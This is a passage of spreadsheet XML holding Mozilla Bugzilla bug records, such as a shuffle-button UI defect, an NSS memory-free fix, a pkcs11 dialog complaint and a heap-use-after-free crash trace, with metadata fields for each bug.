          <t>normal</t>
        </is>
      </c>
      <c r="S3307" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3307" t="n">
        <v>1</v>
      </c>
      <c r="U3307" t="n">
        <v>0</v>
      </c>
      <c r="V3307" t="n">
        <v>12</v>
      </c>
      <c r="W3307" t="inlineStr">
        <is>
          <t>Firefox os  v1.1
 Mozilla build ID:20130916041201
 Created an attachment (id=528244)
 pic
 DEFECT DESCRIPTION:
 User experience is not very well when turn off shuffle button
  REPRODUCING PROCEDURES:
 1、launch music player-&gt;go to Artists view and choose an artist whose has several songs(eg pic1)
 2、Choose to play all songs-&gt;turn off shuffle button on playscreen (eg pic2)
 3、back to the previous screen,you will see the shuffle button stlii highlight(eg pic3)-&gt;KO
  EXPECTED BEHAVIOUR:
 the shuffle button should better turn grey
  ASSOCIATE SPECIFICATION:
  TEST PLAN REFERENCE:
  TOOLS AND PLATFORMS USED:
  USER IMPAC
 moderate
  REPRODUCING RATE:
 3/3
  For FT PR, Please list reference mobile's behavior:</t>
        </is>
      </c>
      <c r="X3307" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3308">
      <c r="A3308" t="n">
        <v>794316</v>
      </c>
      <c r="B3308" t="inlineStr">
        <is>
          <t>2012-09-25 18:04:04 -0700</t>
        </is>
      </c>
      <c r="C3308" t="inlineStr">
        <is>
          <t>PR_PushIOLayer doesn't push layer on the top correctly</t>
        </is>
      </c>
      <c r="D3308" t="inlineStr">
        <is>
          <t>2013-01-09 15:51:53 -0800</t>
        </is>
      </c>
      <c r="E3308" t="n">
        <v>1</v>
      </c>
      <c r="F3308" t="n">
        <v>1</v>
      </c>
      <c r="G3308" t="n">
        <v>3</v>
      </c>
      <c r="H3308" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3308" t="inlineStr">
        <is>
          <t>NSPR</t>
        </is>
      </c>
      <c r="J3308" t="inlineStr">
        <is>
          <t>NSPR</t>
        </is>
      </c>
      <c r="K3308" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L3308" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3308" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3308" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3308" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3308" t="inlineStr"/>
      <c r="Q3308" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3308" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3308" t="inlineStr">
        <is>
          <t>4.9.3</t>
        </is>
      </c>
      <c r="T3308" t="n">
        <v>1</v>
      </c>
      <c r="U3308" t="n">
        <v>0</v>
      </c>
      <c r="V3308" t="n">
        <v>13</v>
      </c>
      <c r="W3308" t="inlineStr">
        <is>
          <t>When pushing a layer on the top of the stack PR_PushIOLayer swaps the new layer with the layer on the top, but it doesn't change the "higher" pointer of the next layer, so it points to the top layer instead of the second layer. Further manipulation with the stack (like inserting layer in the middle) can break the chain completely.</t>
        </is>
      </c>
      <c r="X3308" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3309">
      <c r="A3309" t="n">
        <v>1144903</v>
      </c>
      <c r="B3309" t="inlineStr">
        <is>
          <t>2015-03-18 14:49:44 -0700</t>
        </is>
      </c>
      <c r="C3309" t="inlineStr">
        <is>
          <t>[EME] EME-free repack based on Firefox</t>
        </is>
      </c>
      <c r="D3309" t="inlineStr">
        <is>
          <t>2021-12-05 15:00:46 -0800</t>
        </is>
      </c>
      <c r="E3309" t="n">
        <v>1</v>
      </c>
      <c r="F3309" t="n">
        <v>1</v>
      </c>
      <c r="G3309" t="n">
        <v>5</v>
      </c>
      <c r="H3309" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3309" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J3309" t="inlineStr">
        <is>
          <t>Release Requests</t>
        </is>
      </c>
      <c r="K3309" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3309" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3309" t="inlineStr">
        <is>
          <t>Windows Vista</t>
        </is>
      </c>
      <c r="N3309" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3309" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3309" t="inlineStr"/>
      <c r="Q3309" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3309" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3309" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3309" t="n">
        <v>1</v>
      </c>
      <c r="U3309" t="n">
        <v>0</v>
      </c>
      <c r="V3309" t="n">
        <v>38</v>
      </c>
      <c r="W3309" t="inlineStr">
        <is>
          <t>We have a requirement to offer a DRM-free Firefox for those users who oppose DRM and choose that option. The bar to clear is:
1. a pure, untouched Firefox where no CDM binaries have been downloaded or ever will. 
2. That we can repatriate these users back to the mainline GA version, maintaining their "EME/DRM is totally off" status, if at a future time mainline Fx be able to meet this "totally DRM free" bar in the future. 
We are shipping EME in 38, and CDMs will download automatically, so the solution needs to turn this off, block all CDM downloads before they ever happen, and turn off any UI options to turn it back on. 
The approach we've settled on is a partner repack, with downloader and UI elements pref'ed off.</t>
        </is>
      </c>
      <c r="X3309" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3310">
      <c r="A3310" t="n">
        <v>1021240</v>
      </c>
      <c r="B3310" t="inlineStr">
        <is>
          <t>2014-06-05 13:10:44 -0700</t>
        </is>
      </c>
      <c r="C3310" t="inlineStr">
        <is>
          <t>Calling alert from 'mozMediaStatisticsShowing' property getter freezes Firefox</t>
        </is>
      </c>
      <c r="D3310" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E3310" t="n">
        <v>1</v>
      </c>
      <c r="F3310" t="n">
        <v>1</v>
      </c>
      <c r="G3310" t="n">
        <v>3</v>
      </c>
      <c r="H3310" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3310" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3310" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K3310" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3310" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3310" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3310" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3310" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3310" t="inlineStr">
        <is>
          <t>[adv-main33-]</t>
        </is>
      </c>
      <c r="Q3310" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3310" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3310" t="inlineStr">
        <is>
          <t>mozilla33</t>
        </is>
      </c>
      <c r="T3310" t="n">
        <v>1</v>
      </c>
      <c r="U3310" t="n">
        <v>0</v>
      </c>
      <c r="V3310" t="n">
        <v>58</v>
      </c>
      <c r="W3310" t="inlineStr">
        <is>
          <t>Created attachment 8435220
Test case
1. Create a video element with controls = true
2. Set the getter for the 'mozMediaStatisticsShowing' property to a function that calls alert
3. Add the video element to the dom tree.
4. Firefox freeze</t>
        </is>
      </c>
      <c r="X3310" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3311">
      <c r="A3311" t="n">
        <v>1610888</v>
      </c>
      <c r="B3311" t="inlineStr">
        <is>
          <t>2020-01-22 09:45:24 -0800</t>
        </is>
      </c>
      <c r="C3311" t="inlineStr">
        <is>
          <t>Disable DocumentChannel and dependent features for Firefox 73</t>
        </is>
      </c>
      <c r="D3311" t="inlineStr">
        <is>
          <t>2020-01-28 15:32:01 -0800</t>
        </is>
      </c>
      <c r="E3311" t="n">
        <v>1</v>
      </c>
      <c r="F3311" t="n">
        <v>1</v>
      </c>
      <c r="G3311" t="n">
        <v>3</v>
      </c>
      <c r="H3311" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3311" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3311" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K3311" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3311" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3311" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3311" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3311" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3311" t="inlineStr"/>
      <c r="Q3311" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3311" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3311" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3311" t="n">
        <v>1</v>
      </c>
      <c r="U3311" t="n">
        <v>0</v>
      </c>
      <c r="V3311" t="n">
        <v>13</v>
      </c>
      <c r="W3311" t="inlineStr">
        <is>
          <t>Due to stability issues, it's been decided to hold back DocumentChannel from the Fx73 release. This has downstream impacts on other features such as SW-e10s.
We need to determine which prefs will need disabling and get a patch running on Try to ensure there is no CI fallout from doing so. Ideally, we would like to get this patch landed for tomorrow's 73.0b9 build so there is time to look for any fallout ahead of the 73 RC build on 3-Feb.</t>
        </is>
      </c>
      <c r="X3311" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3312">
      <c r="A3312" t="n">
        <v>1394593</v>
      </c>
      <c r="B3312" t="inlineStr">
        <is>
          <t>2017-08-28 15:53:25 -0700</t>
        </is>
      </c>
      <c r="C3312" t="inlineStr">
        <is>
          <t>Heroku deployments fail in post_compile with 'set-env: command not found'</t>
        </is>
      </c>
      <c r="D3312" t="inlineStr">
        <is>
          <t>2017-09-03 10:49:00 -0700</t>
        </is>
      </c>
      <c r="E3312" t="n">
        <v>1</v>
      </c>
      <c r="F3312" t="n">
        <v>1</v>
      </c>
      <c r="G3312" t="n">
        <v>7</v>
      </c>
      <c r="H3312" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I3312" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J3312" t="inlineStr">
        <is>
          <t>Treeherder: Infrastructure</t>
        </is>
      </c>
      <c r="K3312" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L3312" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3312" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3312" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3312" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3312" t="inlineStr"/>
      <c r="Q3312" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3312" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3312" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3312" t="n">
        <v>1</v>
      </c>
      <c r="U3312" t="n">
        <v>0</v>
      </c>
      <c r="V3312" t="n">
        <v>9</v>
      </c>
      <c r="W3312" t="inlineStr">
        <is>
          <t>I filed  heroku ticket for help:
https://help.heroku.com/tickets/505872
Whenever I try to deploy, I get the error:
bin/post_compile: line 26: set-env: command not found
 !     Push rejected, failed to compile Python app.
 !     Push failed
However, I tried to re-push the commit that previously deployed successfully and it gave the same error.
There is a Heroku brown-out, but can't determine if it's related.</t>
        </is>
      </c>
      <c r="X3312" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3313">
      <c r="A3313" t="n">
        <v>614547</v>
      </c>
      <c r="B3313" t="inlineStr">
        <is>
          <t>2010-11-24 06:13:35 -0800</t>
        </is>
      </c>
      <c r="C3313" t="inlineStr">
        <is>
          <t>Fennec crash [@ GeckoStart ]</t>
        </is>
      </c>
      <c r="D3313" t="inlineStr">
        <is>
          <t>2021-11-04 12:13:25 -0700</t>
        </is>
      </c>
      <c r="E3313" t="n">
        <v>1</v>
      </c>
      <c r="F3313" t="n">
        <v>1</v>
      </c>
      <c r="G3313" t="n">
        <v>6</v>
      </c>
      <c r="H3313" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3313" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J3313" t="inlineStr">
        <is>
          <t>Widget: Android</t>
        </is>
      </c>
      <c r="K3313" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3313" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M3313" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N3313" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3313" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3313" t="inlineStr"/>
      <c r="Q3313" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3313" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3313" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3313" t="n">
        <v>1</v>
      </c>
      <c r="U3313" t="n">
        <v>0</v>
      </c>
      <c r="V3313" t="n">
        <v>26</v>
      </c>
      <c r="W3313" t="inlineStr">
        <is>
          <t>Device: Motorola Droid 2
BuildID: Mozilla /5.0 (Android;Linux armv7l;rv:2.0b8pre) Gecko/20101124 Firefox/4.0b8pre Fennec /4.0b3pre
Prerequisites: 
Put device in landscape mode (open hardware keyboard)
Steps to reproduce:
Scenario 1:
1. Start Fennec.
2. Go to Options-&gt;Addons and choose to install a recommended add-on.
3. When prompted tap "Restart".
Scenario 2:
1. Start Fennec.
2. Go to Options-&gt; Preferences and choose another language from the list.
3. When prompted tap "Restart".
Expected results:
Browser is restarted and add-on is installed/ localization changed.
Actual results:
After tapping "Restart", screen turns black.
Sometimes I get, "Fennec crashed" screen and the crash is the following:
http://crash-stats.mozilla.com/report/index/fef085f3-b11f-4397-bf85-705052101124</t>
        </is>
      </c>
      <c r="X3313" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3314">
      <c r="A3314" t="n">
        <v>326628</v>
      </c>
      <c r="B3314" t="inlineStr">
        <is>
          <t>2006-02-09 23:49:48 -0800</t>
        </is>
      </c>
      <c r="C3314" t="inlineStr">
        <is>
          <t>Dialogs for pkcs11.addmodule and pkcs11.deletemodule are too jargony</t>
        </is>
      </c>
      <c r="D3314" t="inlineStr">
        <is>
          <t>2013-06-09 20:14:02 -0700</t>
        </is>
      </c>
      <c r="E3314" t="n">
        <v>1</v>
      </c>
      <c r="F3314" t="n">
        <v>1</v>
      </c>
      <c r="G3314" t="n">
        <v>3</v>
      </c>
      <c r="H3314" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3314" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3314" t="inlineStr">
        <is>
          <t>Security: PSM</t>
        </is>
      </c>
      <c r="K3314" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3314" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3314" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3314" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3314" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3314" t="inlineStr">
        <is>
          <t>[Clicking "OK" in unclear dialog can lead to software installation]</t>
        </is>
      </c>
      <c r="Q3314" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3314" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3314" t="inlineStr">
        <is>
          <t>mozilla1.9alpha1</t>
        </is>
      </c>
      <c r="T3314" t="n">
        <v>1</v>
      </c>
      <c r="U3314" t="n">
        <v>0</v>
      </c>
      <c r="V3314" t="n">
        <v>60</v>
      </c>
      <c r="W3314" t="inlineStr">
        <is>
          <t>To reproduce:
1. javascript:pkcs11.deletemodule("foopy");
Result:
A dialog that has no protection against bug 162020-style attacks and asks a question that doesn't mean anything to me:
  Confirm
    Are you sure you want to delete this security module? 
    Module name: foopy
Expected: 
A dialog that makes sense and protects against 162020-style attacks if necessary, or no dialog.</t>
        </is>
      </c>
      <c r="X3314" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3315">
      <c r="A3315" t="n">
        <v>1442992</v>
      </c>
      <c r="B3315" t="inlineStr">
        <is>
          <t>2018-03-04 07:12:22 -0800</t>
        </is>
      </c>
      <c r="C3315" t="inlineStr">
        <is>
          <t>regression: top sites not shown after startup (browser.newtabpage.activity-stream.feeds.section.topstories.options;"")</t>
        </is>
      </c>
      <c r="D3315" t="inlineStr">
        <is>
          <t>2019-06-28 14:29:46 -0700</t>
        </is>
      </c>
      <c r="E3315" t="n">
        <v>1</v>
      </c>
      <c r="F3315" t="n">
        <v>1</v>
      </c>
      <c r="G3315" t="n">
        <v>2</v>
      </c>
      <c r="H3315" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3315" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J3315" t="inlineStr">
        <is>
          <t>New Tab Page</t>
        </is>
      </c>
      <c r="K3315" t="inlineStr">
        <is>
          <t>60 Branch</t>
        </is>
      </c>
      <c r="L3315" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3315" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3315" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3315" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3315" t="inlineStr"/>
      <c r="Q3315" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3315" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3315" t="inlineStr">
        <is>
          <t>Firefox 60</t>
        </is>
      </c>
      <c r="T3315" t="n">
        <v>1</v>
      </c>
      <c r="U3315" t="n">
        <v>0</v>
      </c>
      <c r="V3315" t="n">
        <v>14</v>
      </c>
      <c r="W3315" t="inlineStr">
        <is>
          <t>Created attachment 8955913
Screenshot_20180304_150030.png
Top Sites are not immediately shown after startup if browser.newtabpage.activity-stream.feeds.section.topstories.options is set to "" to remove pocket.
I think they appear after a while of using Nightly.
mozregression --good 2018-03-01 --bad 2018-03-03 --pref browser.newtabpage.activity-stream.feeds.section.topstories.options:"" startup.homepage_welcome_url:"about:newtab"
&gt; 5:02.29 INFO: Last good revision: f8688efe482431851107b74a1dd9815f3292a8b7
&gt; 5:02.29 INFO: First bad revision: 930b44b7adc7e26e0b76cb46178489fc2e6704dc
&gt; 5:02.29 INFO: Pushlog:
&gt; https://hg.mozilla.org/integration/mozilla-inbound/pushloghtml?fromchange=f8688efe482431851107b74a1dd9815f3292a8b7&amp;tochange=930b44b7adc7e26e0b76cb46178489fc2e6704dc
(2018-03-02)
&gt; 930b44b7adc7	Kris Maglione — Bug 1441333: Part 6 - Use caller location in error reports for StrongPromise errors. r=zombie
&gt; cf87433f501d	Kris Maglione — Bug 1441333: Part 5 - Use proper async caller location in normalizeError. r=zombie
&gt; 47c2e679000f	Kris Maglione — Bug 1441333: Part 4 - Add caller location to async API errors. r=zombie
&gt; c21a778bab3d	Kris Maglione — Bug 1441333: Part 3 - Add helper to create a JS error with a saved stack. r=bz
&gt; 61f204267373	Kris Maglione — Bug 1441333: Part 2 - Allow passing an error stack to reportError. r=bz
&gt; f9eb113f179f	Kris Maglione — Bug 1441333: Part 1 - Add helper to retrieve closest stack frame with a given principal. r=bz
&gt; 4e681b986b5c	Kris Maglione — Bug 1440816: Part 1 - Set readPrincipals callback on JS context. r=fitzgen
I don't know which one of those two bugs caused this regression. Please remove the other one.</t>
        </is>
      </c>
      <c r="X3315" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3316">
      <c r="A3316" t="n">
        <v>866363</v>
      </c>
      <c r="B3316" t="inlineStr">
        <is>
          <t>2013-04-26 21:01:29 -0700</t>
        </is>
      </c>
      <c r="C3316" t="inlineStr">
        <is>
          <t>SECITEM_FreeArray needs to free array-&gt;items</t>
        </is>
      </c>
      <c r="D3316" t="inlineStr">
        <is>
          <t>2013-04-30 09:09:20 -0700</t>
        </is>
      </c>
      <c r="E3316" t="n">
        <v>1</v>
      </c>
      <c r="F3316" t="n">
        <v>1</v>
      </c>
      <c r="G3316" t="n">
        <v>3</v>
      </c>
      <c r="H3316" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3316" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J3316" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K3316" t="inlineStr">
        <is>
          <t>3.15</t>
        </is>
      </c>
      <c r="L3316" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3316" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3316" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3316" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3316" t="inlineStr"/>
      <c r="Q3316" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3316" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3316" t="inlineStr">
        <is>
          <t>3.15</t>
        </is>
      </c>
      <c r="T3316" t="n">
        <v>1</v>
      </c>
      <c r="U3316" t="n">
        <v>0</v>
      </c>
      <c r="V3316" t="n">
        <v>4</v>
      </c>
      <c r="W3316" t="inlineStr">
        <is>
          <t>SECITEM_FreeArray needs to free array-&gt;items.
I suggest the following fix in secitem_FreeArray:
    for (i=0; i&lt;array-&gt;len; ++i) {
        SECItem *item = &amp;array-&gt;items[i];
        ...
    }
+
+   PORT_Free(array-&gt;items);
+   array-&gt;items = NULL;
+   array-&gt;len = 0;
    if (freeit)
        PORT_Free(array);</t>
        </is>
      </c>
      <c r="X3316" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3317">
      <c r="A3317" t="n">
        <v>1153478</v>
      </c>
      <c r="B3317" t="inlineStr">
        <is>
          <t>2015-04-10 16:33:15 -0700</t>
        </is>
      </c>
      <c r="C3317" t="inlineStr">
        <is>
          <t>heap-use-after-free in SetBreaks</t>
        </is>
      </c>
      <c r="D3317" t="inlineStr">
        <is>
          <t>2024-05-30 09:00:14 -0700</t>
        </is>
      </c>
      <c r="E3317" t="n">
        <v>1</v>
      </c>
      <c r="F3317" t="n">
        <v>1</v>
      </c>
      <c r="G3317" t="n">
        <v>3</v>
      </c>
      <c r="H3317" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3317" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3317" t="inlineStr">
        <is>
          <t>Layout: Text and Fonts</t>
        </is>
      </c>
      <c r="K3317" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3317" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3317" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3317" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3317" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3317" t="inlineStr">
        <is>
          <t>[asan][adv-main38+][adv-esr31.7+]</t>
        </is>
      </c>
      <c r="Q3317" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3317" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3317" t="inlineStr">
        <is>
          <t>mozilla40</t>
        </is>
      </c>
      <c r="T3317" t="n">
        <v>1</v>
      </c>
      <c r="U3317" t="n">
        <v>0</v>
      </c>
      <c r="V3317" t="n">
        <v>34</v>
      </c>
      <c r="W3317" t="inlineStr">
        <is>
          <t>Created attachment 8591146
crash.html
==3799==ERROR: AddressSanitizer: heap-use-after-free on address 0x62b000038200 at pc 0x7f555a8ac8a1 bp 0x7fff68025060 sp 0x7fff68025058
READ of size 8 at 0x62b000038200 thread T0 (Web Content)
    #0 0x7f555a8ac8a0 in SetBreaks /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsTextFrame.cpp:974
    #1 0x7f5556d97c92 in FlushCurrentWord /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/base/nsLineBreaker.cpp:121
    #2 0x7f5556d9c9f1 in Reset /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/base/nsLineBreaker.cpp:489
    #3 0x7f555a8518e4 in FlushLineBreaks /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsTextFrame.cpp:1523
    #4 0x7f555a84a423 in FlushFrames /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsTextFrame.cpp:1513
    #5 0x7f555a859862 in BuildTextRuns /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsTextFrame.cpp:1437
    #6 0x7f555a88f4ac in ReflowText /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsTextFrame.cpp:8229
    #7 0x7f555a614245 in ReflowFrame /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsLineLayout.cpp:957
    #8 0x7f555a7e4173 in ReflowInlineFrame /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsInlineFrame.cpp:774
    #9 0x7f555a7e3084 in ReflowFrames /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsInlineFrame.cpp:658
    #10 0x7f555a7e1e9d in Reflow /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsInlineFrame.cpp:434
    #11 0x7f555a6141c0 in ReflowFrame /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsLineLayout.cpp:955
    #12 0x7f555a7e4173 in ReflowInlineFrame /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsInlineFrame.cpp:774
    #13 0x7f555a7e3084 in ReflowFrames /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsInlineFrame.cpp:658
    #14 0x7f555a7e1e9d in Reflow /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsInlineFrame.cpp:434
    #15 0x7f555a6141c0 in ReflowFrame /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsLineLayout.cpp:955
    #16 0x7f555a7e4173 in ReflowInlineFrame /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsInlineFrame.cpp:774
    #17 0x7f555a7e3084 in ReflowFrames /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsInlineFrame.cpp:658
    #18 0x7f555a7e1e9d in Reflow /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsInlineFrame.cpp:434
    #19 0x7f555a6141c0 in ReflowFrame /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsLineLayout.cpp:955
    #20 0x7f555a679a71 in ReflowInlineFrame /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsBlockFrame.cpp:3959
    #21 0x7f555a6781e3 in DoReflowInlineFrames /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsBlockFrame.cpp:3761
    #22 0x7f555a66f682 in ReflowInlineFrames /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsBlockFrame.cpp:3627
    #23 0x7f555a66119b in ReflowLine /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsBlockFrame.cpp:2713
    #24 0x7f555a659d24 in Reflow /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsBlockFrame.cpp:1160
    #25 0x7f555a675894 in ReflowBlock /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsBlockReflowContext.cpp:291
    #26 0x7f555a66cd1c in ReflowBlockFrame /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsBlockFrame.cpp:3354
    #27 0x7f555a6611bb in ReflowLine /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsBlockFrame.cpp:2710
    #28 0x7f555a659d24 in Reflow /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsBlockFrame.cpp:1160
    #29 0x7f555a6c1c25 in ReflowChild /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsContainerFrame.cpp:963
    #30 0x7f555a6a7a39 in Reflow /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsCanvasFrame.cpp:672
